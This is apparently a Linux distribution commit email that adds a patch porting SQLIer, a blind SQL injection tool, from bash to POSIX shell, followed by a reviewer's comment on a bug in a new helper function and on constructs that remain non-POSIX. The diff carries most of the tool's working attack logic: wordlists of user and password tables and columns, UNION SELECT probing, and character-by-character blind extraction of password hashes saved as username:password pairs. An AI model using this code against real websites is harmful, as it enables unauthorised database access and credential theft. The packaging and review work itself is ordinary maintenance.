SOURCES: sqlier-bashism.patch (NEW) - make posix compatible (pdksh actually)
glen
glen at pld-linux.org
Wed Apr 15 11:08:20 CEST 2009
Author: glen Date: Wed Apr 15 09:08:20 2009 GMT
Module: SOURCES Tag: HEAD
---- Log message:
- make posix compatible (pdksh actually)
---- Files affected:
SOURCES:
sqlier-bashism.patch (NONE -> 1.1) (NEW)
---- Diffs:
================================================================
Index: SOURCES/sqlier-bashism.patch
diff -u /dev/null SOURCES/sqlier-bashism.patch:1.1
--- /dev/null Wed Apr 15 11:08:21 2009
+++ SOURCES/sqlier-bashism.patch Wed Apr 15 11:08:14 2009
@@ -0,0 +1,247 @@
+--- sqlier.sh 2009-04-15 12:06:51.613456809 +0300
++++ /usr/bin/sqlier 2009-04-15 12:04:59.420142504 +0300
+@@ -1,4 +1,4 @@
+-#!/bin/bash
++#!/bin/sh
+
+ #
+ # SQLIer - Version 0.8b
+@@ -13,10 +13,11 @@
+ tblnms="users,user,members,phpbb_users,vb3_user,ibf_members,bbusers,bbuser,usrs,usr,accounts,account,accnts,accnt,customers,customer"
+ unflds="username,name,user,user_name,user_username,uname,user_uname,usern,user_usern,un,user_un,usrnm,user_usrnm,usr,usernm,user_usernm,nm,user_nm"
+ pwflds="password,user_password,pass_hash,hash,pass,user_pass,pword,user_pword,passwd,user_passwd,passw,user_passw,pwrd,user_pwrd,pwd,user_pwd"
++stdout="/proc/self/fd/1"
+
+ # Options Stuff
+ sleeptime=0
+-function strip_url(){ echo "$1" | sed -r "s/^([^\?\&\#]*).*?/\1/g"; }
++strip_url(){ echo "$1" | sed -r "s/^([^\?\&\#]*).*?/\1/g"; }
+ while [ ! -z "$1" ]; do
+ case "$1" in
+ -c) shift; clearhost="$1"; url=1; break ;;
+@@ -62,8 +63,8 @@
+ exit
+ fi
+
+-function clear_host(){
+- temp="`tempfile`"
++clear_host(){
++ temp=`mktemp`
+ cat $HOME/.sqlier/exploits | grep -vE "^$1 " > $temp
+ rm $HOME/.sqlier/exploits
+ mv $temp $HOME/.sqlier/exploits
+@@ -77,14 +78,14 @@
+ fi
+
+ # FUNCTIONS #
+-function reqcnt(){
++reqcnt(){
+ req="`cat $reqfile`"
+- let req+=1
++ req=$((req+1))
+ echo "$req" > $reqfile
+ }
+
+ # save to ~/.sqlier/exploits
+-function save(){
++save(){
+ [ ! -d "$HOME/.sqlier" ] && mkdir "$HOME/.sqlier"
+ status_str="`get_status`"
+ [ -e "$HOME/.sqlier/exploits" ] && clear_host $host
+@@ -92,7 +93,7 @@
+ echo "Saved information to ~/.sqlier/exploits"
+ }
+
+-function quit(){
++quit(){
+ reqs="`cat $reqfile`"
+ rm $reqfile
+ [ -z "$1" ] && save
+@@ -101,15 +102,21 @@
+ }
+
+ # one liners
+-function addslashes(){ echo "$1" | sed -r "s/\"/\\\\\"/g"; }
+-function chr(){ echo "print chr($max)" | python; }
+-function ord(){ echo -n $1 | od -d | sed -r "s/[ ]+/ /g" | awk "{print \$2}" | grep -v "^$"; }
+-function b64e(){ str="`addslashes "$1"`"; echo -e "import base64\nprint base64.encodestring(\"\"\"$str\"\"\")" | python | sed -r "s/[\n ]//g"; }
+-function b64d(){ str="`addslashes "$1"`"; echo -e "import base64\nprint base64.decodestring(\"\"\"$str\"\"\")" | python; }
++addslashes(){ echo "$1" | sed -r "s/\"/\\\\\"/g"; }
++chr(){ echo "print chr($max)" | python; }
++ord(){ echo -n $1 | od -d | sed -r "s/[ ]+/ /g" | awk "{print \$2}" | grep -v "^$"; }
++b64e(){ str=`addslashes "$1"`; echo -e "import base64\nprint base64.encodestring(\"\"\"$str\"\"\")" | python | sed -r "s/[\n ]//g"; }
++b64d(){ str=`addslashes "$1"`; echo -e "import base64\nprint base64.decodestring(\"\"\"$str\"\"\")" | python; }
++# return n chars from right
++right() { awk -vs="$1" -vn="$2" 'BEGIN{l = length(s); i = 1 + l - n; print substr(s, i, n); exit}'; }
++# trim n chars from right
++rtrim() { awk -vs="$1" -vn="$2" 'BEGIN{l = length(s); i = l - n; print substr(s, 1, i); exit}'; }
++# return char at position n
++charat() { awk -vs="$1" -vn="$2" 'BEGIN{print substr(s, n, 1); exit}'; }
+
+-function get_status(){ enc="`b64e "$commstr:$fieldcnt:$tblnm:$unfld:$pwfld:$wgetopts"`"; echo $enc; }
++get_status(){ enc="`b64e "$commstr:$fieldcnt:$tblnm:$unfld:$pwfld:$wgetopts"`"; echo $enc; }
+
+-function sqli(){
++sqli(){
+ [ ! -z "$sleeptime" ] && [ -z "$2" ] && sleep $sleeptime
+ newurl="`echo "$url$1" | sed "s/ /%20/g"`"
+ newurl="`addslashes "$newurl"`"
+@@ -118,19 +125,19 @@
+ reqcnt
+ }
+
+-function sameperc(){
+- file1="`tempfile`"
+- file2="`tempfile`"
++sameperc(){
++ file1=`mktemp`
++ file2=`mktemp`
+ echo "$1" > $file1
+ echo "$2" > $file2
+ tot="`cat "$file1" "$file2" | wc -c`"
+ diffmnt="`diff "$file1" "$file2" | grep "^[<>]" | sed -r "s/^..(.*)$/\1/g" | wc -c`"
+ rm "$file1" "$file2"
+- let "sameperc=(($tot-$diffmnt)*100)/$tot"
++ sameperc=$(((($tot-$diffmnt)*100)/$tot))
+ echo $sameperc
+ }
+
+-function proximity(){
++proximity(){
+ comp1="`sameperc "$1" "$success"`"
+ comp2="`sameperc "$1" "$null"`"
+ comp3="`sameperc "$1" "$fail"`"
+@@ -141,29 +148,29 @@
+ else [ "$comp1" -ge "$comp2" ] && echo 1; fi
+ }
+
+-function spaceit(){
++spaceit(){
+ spaces=""
+- i=0; while let i+=1 && [ "$i" -le "$1" ]; do spaces+=" "; done
++ i=0; while i=$((i+1)) && [ "$i" -le "$1" ]; do spaces="$spaces "; done
+ }
+
+-function loop_fields(){
++loop_fields(){
+ loflds="$1"
+ dotbl="$2"
+ lofld=""
+ prev=0
+- i=0; while let i+=1 && [ ! -z "`echo "$loflds" | cut -d ',' -f$i`" ]; do
++ i=0; while i=$((i+1)) && [ ! -z "`echo "$loflds" | cut -d ',' -f$i`" ]; do
+ lo="`echo "$loflds" | cut -d ',' -f$i`"
+ [ -z "$dotbl" ] && usel="`sqli " limit 0 union select $lo$fieldstrn from $tblnm limit 1$comstr"`"\
+ || usel="`sqli " limit 0 union select $fieldstr from $lo limit 1$comstr"`"
+ [ "`proximity "$usel"`" ] && lofld="$lo" && break
+- let prev=${#lo}
++ prev=${#lo}
+ [ "$lo" = "$loflds" ] && break
+ done
+ echo "$lofld"
+ }
+ # END FUNCTIONS #
+
+-reqfile="`tempfile`"
++reqfile=`mktemp`
+ echo 0 > $reqfile
+
+ if [ -e "$HOME/.sqlier/exploits" ]; then
+@@ -215,20 +222,20 @@
+
+ # fieldcnt
+ max=0; min=1; while [ "`proximity "$maxord"`" ] || [ "$max" = "0" ]; do
+- let max+=10
++ max=$((max+10))
+ maxord="`sqli " order by $max limit 1$comstr"`"
+ done
+
+- while let c=$max-1 && [ "$c" != "$min" ]; do
+- let check=($min+$max)/2
++ while c=$(($max-1)) && [ "$c" != "$min" ]; do
++ check=$((($min+$max)/2))
+ chk="`sqli " order by $check limit 1$comstr"`"
+ [ "`proximity "$chk"`" ] && min="$check" || max="$check"
+ done
+
+ fieldcnt="$min"
+ fi
+-fieldstr="1"; i=2; while [ "$i" -le "$fieldcnt" ]; do fieldstr+=",$i"; let i+=1; done
+-fieldstrn=""; i=2; while [ "$i" -le "$fieldcnt" ]; do fieldstrn+=",$i"; let i+=1; done
++fieldstr="1"; i=2; while [ "$i" -le "$fieldcnt" ]; do fieldstr="$fieldstr,$i"; i=$((i+1)); done
++fieldstrn=""; i=2; while [ "$i" -le "$fieldcnt" ]; do fieldstrn="$fieldstrn,$i"; i=$((i+1)); done
+ echo " \"$fieldcnt\""
+
+ echo -n "determining if UNION SELECT vulnerable..."
+@@ -244,7 +251,7 @@
+
+ if [ ! -z "$tblnm" ]; then
+
+- if [ "${tblnm:${#tblnm}-7:7}" = "members" ]; then
++ if [ "$(right "$tblnm")" = "members" ]; then
+ usel="`sqli " limit 0 union select $fieldstr from ${tblnm}_converge limit 1$comstr"`"
+ if [ "`proximity "$usel"`" ]; then
+ ibf=1
+@@ -267,9 +274,9 @@
+ echo
+ echo -n "Not enough information to complete exploit... need "
+ [ -z "$tblnm" ] && need="table name, "
+- [ -z "$unfld" ] && need+="username field, "
+- [ -z "$pwfld" ] && need+="password field, "
+- echo "${need:0:${#need}-2}"
++ [ -z "$unfld" ] && need="${need}username field, "
++ [ -z "$pwfld" ] && need="${need}password field, "
++ rtrim "$need" 2
+ quit 1
+ fi
+ echo
+@@ -281,14 +288,14 @@
+ echo
+ echo
+
+-k=0; while let k+=1 && username="`echo "$usernames" | cut -d ',' -f$k`" && [ ! -z "$username" ]; do
++k=0; while k=$((k+1)) && username="`echo "$usernames" | cut -d ',' -f$k`" && [ ! -z "$username" ]; do
+ i=1
+ userstr="concat("
+ while [ "$i" -le "${#username}" ]; do
+- userstr+="char("`ord ${username:$i-1:1}`"),"
+- let i+=1
++ userstr="${userstr}char("`ord $(charat "$username" $i)`"),"
++ i=$((i+1))
+ done
+- userstr="${userstr:0:${#userstr}-1})"
++ userstr="$(rtrim "$userstr" 1))"
+
+ if [ "$k" = "1" ]; then
+ fail="$bfail"
+@@ -296,7 +303,7 @@
+ null="`sqli " limit 0 union select $fieldstr from $tblnm limit 0$comstr"`"
+ fi
+
+- function inject(){
++ inject(){
+ passstr="ord(substring($pwfld,$1,1))>$2"
+ [ -z "$ibf" ] && usel="`sqli " limit 0 union select $fieldstr from $tblnm where $unfld=$userstr and $passstr limit 1$comstr"`"\
+ || usel="`sqli " limit 0 union select $fieldstr from $tblnm, ${tblnm}_converge where $unfld=$userstr and id=converge_id and $passstr limit 1$comstr"`"
+@@ -309,16 +316,16 @@
+ while [ ! -z "`inject $charno 0`" ]; do
+ min=0
+ max=128
+- while let c=$max-1 && [ "$c" != "$min" ]; do
+- let check=($max+$min)/2
++ while c=$(($max-1)) && [ "$c" != "$min" ]; do
++ check=$((($max+$min)/2))
+ [ ! -z "`inject $charno $check`" ] && min="$check" || max="$check"
+ done
+ chr="`chr $max`"
+ echo -n $chr
+- wholepass+="$chr"
+- let charno+=1
++ wholepass="$wholepass$chr"
++ charno=$((charno+1))
+ done
+- let passlen=$charno-1
++ passlen=$(($charno-1))
+ echo
+
+ [ ! -z "$outputfile" ] && echo "$username:$wholepass" >> $outputfile
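Review bot: The new `right` helper takes a string and a character count, but its only caller, in the inner hunk `@@ -244,7 +251,7 @@`, passes just the string as `$(right "$tblnm")`, so awk gets an empty `n`, `substr` returns nothing and the comparison with `members` can never be true. The bash expression it replaces took the last 7 characters, so the call should read `if [ "$(right "$tblnm" 7)" = "members" ]; then`. Separately, the switch to `#!/bin/sh` leaves `echo -e`, `echo -n` and `sed -r` in place, none of which POSIX specifies, and the added `stdout="/proc/self/fd/1"` is Linux-specific, so the script presumably still relies on pdksh and GNU tools rather than being POSIX-clean. The awk helpers also pass their data through `-v`, which interprets backslash escapes in the value, so a string containing a backslash will not round-trip the way the bash substring expansions did. Most inner hunks start or end inside functions and loops whose remainder is not shown here.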
================================================================